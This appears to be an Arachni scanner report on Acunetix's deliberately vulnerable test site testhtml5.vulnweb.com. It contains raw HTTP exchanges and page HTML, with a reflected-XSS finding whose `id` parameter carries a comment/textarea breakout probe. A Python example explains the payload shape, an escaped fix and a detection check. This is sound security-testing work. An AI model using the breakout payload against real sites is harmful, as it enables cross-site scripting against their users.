class="ng-binding">@EFF</b></a><br> Our Surveillance Self-Defense site has lessons for targeted groups like journalists and journalism students to be safer online without sacrificing access to information. 
<br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" target="_blank" href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/blog.github.com" class="ng-binding" href="#/all/filter/blog.github.com" data-arachni-id="1782715074">blog.github.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/"><div class="detailsboxTitle ng-binding">Custom domains on GitHub Pages gain support for HTTPS</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in 
item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/github" target="_blank" class="ng-binding" href="http://twitter.com/github" data-arachni-id="-279974877">@github</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/github" target="_blank" href="http://twitter.com/github" data-arachni-id="750470370"><b class="ng-binding">@github</b></a><br> Today, custom domains on GitHub Pages are gaining support for HTTPS via @letsencrypt. It's another step towards making the web more secure for everyone. <br><br> </div> </div> </div> </div> <ul class="pager ng-scope"> <li><a ng-href="#/popular/page/-1" ng-show="page>0" href="#/popular/page/-1" style="display: none;">Previous</a></li> <li><a ng-href="#/popular/page/1" ng-show="filter==''" href="#/popular/page/1" data-arachni-id="2424595">Next</a></li> </ul></div></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">unknown is coming from <b>unknown</b> and has visited this page <b>1</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 
2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); 
_arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/"></div> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html> |
This is the original HTTP response body.
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp"> <head> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link
href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>. 
</p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular">Popular</a></li> <li><a href="#/latest">Latest</a></li> <li><a href="#/carousel">Carousel</a></li> <li><a href="#/archive">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about">About</a></li> <li><a href="#/contact">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId"></div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). 
Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // 
Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body> </html> |
Link input `id` using GET at http://testhtml5.vulnweb.com/ pointing to http://testhtml5.vulnweb.com/comment.
<a class="btn btn-mini" ng-href="/comment?id=696a3680438a7af53a0a54d3d26469bf" href="/comment?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="611572569">
<i class="icon-comment" title="Comment">
</i>
</a>
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
| link | http://testhtml5.vulnweb.com/ | http://testhtml5.vulnweb.com/comment | | |

http://testhtml5.vulnweb.com/comment?id=696a3680438a7af53a0a54d3d26469bf%3C/textarea%3E--%3E%3Cxss_0c25785427908905790d3a663dc49fa7/%3E%3C!--%3Ctextarea%3E
Raw HTTP request used to retrieve the page.
GET /comment?id=696a3680438a7af53a0a54d3d26469bf%3C%2Ftextarea%3E--%3E%3Cxss_0c25785427908905790d3a663dc49fa7%2F%3E%3C%21--%3Ctextarea%3E HTTP/1.1
Host: testhtml5.vulnweb.com
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: 0c25785427908905790d3a663dc49fa7
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:57:09 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->
<link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Action</li>
<li class="active"><a href="#/response">Response</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
Sorry, but commenting is currently disabled! <!-- 696a3680438a7af53a0a54d3d26469bf</textarea>--><xss_0c25785427908905790d3a663dc49fa7/><!--<textarea> -->
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p>© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>
<script src="/static/app/app.js"></script>
</body>
</html>
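The injected `id` value in the request above is shaped to escape from two reflection contexts at once: `</textarea>` ends a textarea if the value lands inside one, `-->` ends an HTML comment (the context it actually landed in, see the "Sorry, but commenting is currently disabled!" line of the response, where the value is echoed into `<!-- ... -->`), `<xss_<seed>/>` is a harmless marker element whose tag name carries the scan seed, and the trailing `<!--<textarea>` re-opens a comment so that the page's own closing ` -->` is swallowed. The Python below is an added example, not Arachni's code and not the test site's: `render_vulnerable` is a constructed stand-in for the `/comment` handler, `render_fixed` is the same template with escaping, and `probe_became_element` is the check a scanner performs, tokenizing the response and asking whether the marker became a real element rather than text inside a comment. The function names, the response fragment and the `build_payload` helper are assumptions; the seed and the original `id` value are the ones in the request.

```python
import html
from html.parser import HTMLParser

# Values taken from the request above; the response fragment rendered below
# is constructed to mirror the reflection shown in the response body.
SEED = "0c25785427908905790d3a663dc49fa7"      # X-Arachni-Scan-Seed header
ORIGINAL_ID = "696a3680438a7af53a0a54d3d26469bf"


def build_payload(original_value: str, seed: str) -> str:
    """Reproduce the shape of the injected `id` value: keep the original
    value, close a <textarea> in case the reflection lands in one, close an
    HTML comment, emit the probe element, then re-open a comment and a
    <textarea> so that whatever the page appends after the reflection is
    swallowed.  Hypothetical helper, not Arachni's payload generator."""
    return f"{original_value}</textarea>--><xss_{seed}/><!--<textarea>"


def render_vulnerable(comment_id: str) -> str:
    """Hypothetical stand-in for the /comment handler: the raw `id` value is
    echoed into an HTML comment, exactly as the response above shows."""
    return ('<div class="row-fluid">\n'
            f"Sorry, but commenting is currently disabled! <!-- {comment_id} -->\n"
            "</div><!--/row-->")


def render_fixed(comment_id: str) -> str:
    """Same template with the value HTML-escaped: '>' becomes '&gt;', so the
    injected '-->' can no longer terminate the comment and no element is
    created.  Not echoing request data into markup the browser never needs
    is better still, since '--' inside a comment is non-conforming anyway."""
    return ('<div class="row-fluid">\n'
            f"Sorry, but commenting is currently disabled! <!-- {html.escape(comment_id)} -->\n"
            "</div><!--/row-->")


class TagCollector(HTMLParser):
    """Record the start tags and comments the tokenizer actually produces.
    Markup that stays inside a comment, or is escaped, never reaches
    handle_starttag; that is what separates a reflection from an injection."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.comments: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        # Self-closing form such as <xss_.../>; do not also call
        # handle_starttag or the tag would be counted twice.
        self.tags.append(tag)

    def handle_comment(self, data):
        self.comments.append(data)


def probe_became_element(body: str, seed: str) -> bool:
    """True when the probe tag is a real element in the parsed document,
    i.e. the injected value broke out of its comment context."""
    collector = TagCollector()
    collector.feed(body)
    collector.close()
    return f"xss_{seed}" in collector.tags


if __name__ == "__main__":
    payload = build_payload(ORIGINAL_ID, SEED)
    for name, page in (("vulnerable", render_vulnerable(payload)),
                       ("fixed", render_fixed(payload))):
        print(f"{name}: probe is an element -> {probe_became_element(page, SEED)}")
```

Run as a script, the vulnerable rendering reports the probe as an element and the escaped one does not. The point of the tokenizer-based check is that the payload string being present in the body is not enough to call the reflection exploitable: a value that is echoed but escaped, or that stays inside the comment, never produces the marker tag in `collector.tags`.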
Transitions describe, as a series of events, the steps required to restore the page to the state it had when the scanner processed it. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options |
|---|---|---|---|---|
| 0 | 9.163898 | load | page | |
| 1 | 3.86217 | request | http://testhtml5.vulnweb.com/ | |
| 2 | 3.554117 | request | http://testhtml5.vulnweb.com/static/app/services/itemsService.js | |
| 3 | 0.30496 | request | http://testhtml5.vulnweb.com/ajax/popular?offset=0 | |
| 4 | 0.812222 | request | http://testhtml5.vulnweb.com/static/app/partials/itemsList.html | |
| 5 | 0.570796 | request | http://testhtml5.vulnweb.com/static/scr/default.png | |
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,*
Host: testhtml5.vulnweb.com
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:56:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
<a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
